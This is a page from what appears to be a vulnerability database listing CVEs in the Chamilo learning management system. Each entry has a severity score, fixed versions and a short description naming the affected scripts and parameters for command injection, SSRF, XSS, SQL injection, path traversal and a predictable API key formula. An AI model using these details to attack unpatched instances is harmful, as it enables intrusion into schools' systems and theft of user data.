Chamilo Chamilo-Lms vulnerabilities
68 known vulnerabilities affecting chamilo/chamilo-lms.
Total CVEs
68
CISA KEV
0
Public exploits
0
Exploited in wild
0
Severity breakdown
CRITICAL12HIGH31MEDIUM25
Vulnerabilities
Page 2 of 4
CVE-2025-50199P3CRITICALCVSS 9.1fixed in 1.11.302026-03-02
CVE-2025-50199 [CRITICAL] CWE-918 CVE-2025-50199: Chamilo is a learning management system. Prior to version 1.11.30, there is a blind SSRF vulnerabili
Chamilo is a learning management system. Prior to version 1.11.30, there is a blind SSRF vulnerability in /index.php via the POST openid_url parameter. This issue has been patched in version 1.11.30.
nvd
CVE-2025-50194P3HIGHCVSS 7.2fixed in 1.11.302026-03-02
CVE-2025-50194 [HIGH] CWE-78 CVE-2025-50194: Chamilo is a learning management system. Prior to version 1.11.30, there is an OS Command Injection
Chamilo is a learning management system. Prior to version 1.11.30, there is an OS Command Injection vulnerability in /main/cron/lang/check_parse_lang.php. This issue has been patched in version 1.11.30.
nvd
CVE-2026-31939P3HIGHCVSS 8.3fixed in 1.11.382026-04-10
CVE-2026-31939 [HIGH] CWE-22 CVE-2026-31939: Chamilo LMS is a learning management system. Prior to 1.11.38, there is a path traversal in main/exe
Chamilo LMS is a learning management system. Prior to 1.11.38, there is a path traversal in main/exercise/savescores.php leading to arbitrary file feletion. User input from $_REQUEST['test'] is concatenated directly into filesystem path without canonicalization or traversal checks. This vulnerability is fixed in 1.11.38.
nvd
CVE-2025-50196P3HIGHCVSS 7.2fixed in 1.11.302026-03-02
CVE-2025-50196 [HIGH] CWE-78 CVE-2025-50196: Chamilo is a learning management system. Prior to version 1.11.30, there is an OS Command Injection
Chamilo is a learning management system. Prior to version 1.11.30, there is an OS Command Injection vulnerability in /plugin/vchamilo/views/editinstance.php via the POST main_database parameter. This issue has been patched in version 1.11.30.
nvd
CVE-2025-50195P3HIGHCVSS 7.2fixed in 1.11.302026-03-02
CVE-2025-50195 [HIGH] CWE-78 CVE-2025-50195: Chamilo is a learning management system. Prior to version 1.11.30, there is an OS Command Injection
Chamilo is a learning management system. Prior to version 1.11.30, there is an OS Command Injection vulnerability in /plugin/vchamilo/views/manage.controller.php. This issue has been patched in version 1.11.30.
nvd
CVE-2025-50193P3HIGHCVSS 7.2fixed in 1.11.302026-03-02
CVE-2025-50193 [HIGH] CWE-78 CVE-2025-50193: Chamilo is a learning management system. Prior to version 1.11.30, there is an OS command Injection
Chamilo is a learning management system. Prior to version 1.11.30, there is an OS command Injection vulnerability in /plugin/vchamilo/views/import.php with the POST to_main_database parameter. This issue has been patched in version 1.11.30.
nvd
CVE-2025-50197P3HIGHCVSS 7.2fixed in 1.11.302026-03-02
CVE-2025-50197 [HIGH] CWE-78 CVE-2025-50197: Chamilo is a learning management system. Prior to version 1.11.30, there is an OS Command Injection
Chamilo is a learning management system. Prior to version 1.11.30, there is an OS Command Injection vulnerability in /main/admin/sub_language_ajax.inc.php via the POST new_language parameter. This issue has been patched in version 1.11.30.
nvd
CVE-2025-55289P3CRITICALCVSS 9.0fixed in 1.11.342026-03-06
CVE-2025-55289 [CRITICAL] CWE-79 CVE-2025-55289: Chamilo is a learning management system. Prior to version 1.11.34, there is a stored XSS vulnerabili
Chamilo is a learning management system. Prior to version 1.11.34, there is a stored XSS vulnerability in Chamilo LMS (Verison 1.11.32) allows an attacker to inject arbitrary JavaScript into the platform’s social network and internal messaging features. When viewed by an authenticated user (including administrators), the payload executes in their b
nvd
CVE-2026-33710P3HIGHCVSS 7.5fixed in 1.11.38v>= 2.0.0-alpha.1, < 2.0.0-RC.32026-04-10
CVE-2026-33710 [HIGH] CWE-330 CVE-2026-33710: Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, REST API keys are gene
Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, REST API keys are generated using md5(time() + (user_id * 5) - rand(10000, 10000)). The rand(10000, 10000) call always returns exactly 10000 (min == max), making the formula effectively md5(timestamp + user_id*5 - 10000). An attacker who knows a username and approximate key
nvd
CVE-2025-50191P3HIGHCVSS 7.2fixed in 1.11.302026-03-02
CVE-2025-50191 [HIGH] CWE-89 CVE-2025-50191: Chamilo is a learning management system. Prior to version 1.11.30, there is an error-based SQL Injec
Chamilo is a learning management system. Prior to version 1.11.30, there is an error-based SQL Injection via POST userFile with the /main/exercise/hotpotatoes.php script. This issue has been patched in version 1.11.30.
nvd
CVE-2026-33715P3HIGHCVSS 7.2v>= 2.0-RC.2, < 2.0-RC.32026-04-14
CVE-2026-33715 [HIGH] CWE-306 CVE-2026-33715: Chamilo LMS is an open-source learning management system. In version 2.0-RC.2, the file public/main/
Chamilo LMS is an open-source learning management system. In version 2.0-RC.2, the file public/main/inc/ajax/install.ajax.php is accessible without authentication on fully installed instances because, unlike other AJAX endpoints, it does not include the global.inc.php file that performs authentication and installation-completed checks. Its test_mailer
nvd
CVE-2025-59542P3CRITICALCVSS 9.0fixed in 1.11.342026-03-06
CVE-2025-59542 [CRITICAL] CWE-79 CVE-2025-59542: Chamilo is a learning management system. Prior to version 1.11.34, there is a stored cross-site scri
Chamilo is a learning management system. Prior to version 1.11.34, there is a stored cross-site scripting (XSS) vulnerability. By injecting malicious JavaScript into the course learning path Settings field, an attacker with a low-privileged account (e.g., trainer) can execute arbitrary JavaScript code in the context of any other user viewing the co
nvd
CVE-2025-50188P3HIGHCVSS 7.2fixed in 1.11.302026-03-02
CVE-2025-50188 [HIGH] CWE-89 CVE-2025-50188: Chamilo is a learning management system. Prior to version 1.11.30, the application performs insuffic
Chamilo is a learning management system. Prior to version 1.11.30, the application performs insufficient validation of data coming from the user from the GET value parameter with the following scripts: /plugin/vchamilo/views/syncparams.php and /plugin/vchamilo/ajax/service.php, which allows an attacker to perform an attack aimed at modifying the databa
nvd
CVE-2025-59543P3CRITICALCVSS 9.0fixed in 1.11.342026-03-06
CVE-2025-59543 [CRITICAL] CWE-79 CVE-2025-59543: Chamilo is a learning management system. Prior to version 1.11.34, there is a stored cross-site scri
Chamilo is a learning management system. Prior to version 1.11.34, there is a stored cross-site scripting (XSS) vulnerability. By injecting malicious JavaScript into the course description field, an attacker with a low-privileged account (e.g., trainer) can execute arbitrary JavaScript code in the context of any other user viewing the course inform
nvd
CVE-2026-31940P3HIGHCVSS 8.8fixed in 1.11.38v>= 2.0.0-alpha.1, < 2.0.0-RC.32026-04-10
CVE-2026-31940 [HIGH] CWE-384 CVE-2026-31940: Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, in main/lp/aicc_hacp.p
Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, in main/lp/aicc_hacp.php, user-controlled request parameters are directly used to set the PHP session ID before loading global bootstrap. This leads to session fixation. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.
nvd
CVE-2026-34602P3HIGHCVSS 7.1fixed in 2.0.0-RC.32026-04-14
CVE-2026-34602 [HIGH] CWE-639 CVE-2026-34602: Chamilo LMS is an open-source learning management system. In versions prior to 2.0.0-RC.3, the /api/
Chamilo LMS is an open-source learning management system. In versions prior to 2.0.0-RC.3, the /api/course_rel_users endpoint is vulnerable to Insecure Direct Object Reference (IDOR), allowing an authenticated attacker to modify the user parameter in the request body to enroll any arbitrary user into any course without proper authorization checks. The
nvd
CVE-2025-52469P3HIGHCVSS 7.1fixed in 1.11.302026-03-02
CVE-2025-52469 [HIGH] CWE-841 CVE-2025-52469: Chamilo is a learning management system. Prior to version 1.11.30, a logic vulnerability in the frie
Chamilo is a learning management system. Prior to version 1.11.30, a logic vulnerability in the friend request workflow of Chamilo’s social network module allows an authenticated user to forcibly add any user as a friend by directly calling the AJAX endpoint. The attacker can bypass the normal flow of sending and accepting friend requests, and even ad
nvd
CVE-2026-31941P3MEDIUMCVSS 6.5fixed in 1.11.38v>= 2.0.0-alpha.1, < 2.0.0-RC.32026-04-10
CVE-2026-31941 [MEDIUM] CWE-918 CVE-2026-31941: Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains a
Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains a Server-Side Request Forgery (SSRF) vulnerability in the Social Wall feature. The endpoint read_url_with_open_graph accepts a URL from the user via the social_wall_new_msg_main POST parameter and performs two server-side HTTP requests to that URL with
nvd
CVE-2026-33706P3HIGHCVSS 7.1fixed in 1.11.382026-04-10
CVE-2026-33706 [HIGH] CWE-269 CVE-2026-33706: Chamilo LMS is a learning management system. Prior to 1.11.38, any authenticated user with a REST AP
Chamilo LMS is a learning management system. Prior to 1.11.38, any authenticated user with a REST API key can modify their own status field via the update_user_from_username endpoint. A student (status=5) can change their status to Teacher/CourseManager (status=1), gaining course creation and management privileges. This vulnerability is fixed in 1.11.
nvd
CVE-2025-52482P3HIGHCVSS 8.3fixed in 1.11.302026-03-02
CVE-2025-52482 [HIGH] CWE-79 CVE-2025-52482: Chamilo is a learning management system. Prior to version 1.11.30, a Stored XSS vulnerability exists
Chamilo is a learning management system. Prior to version 1.11.30, a Stored XSS vulnerability exists in the glossary function, enabling all users with the Teachers role to inject JavaScript malicious code against the administrator. This issue has been patched in version 1.11.30.
nvd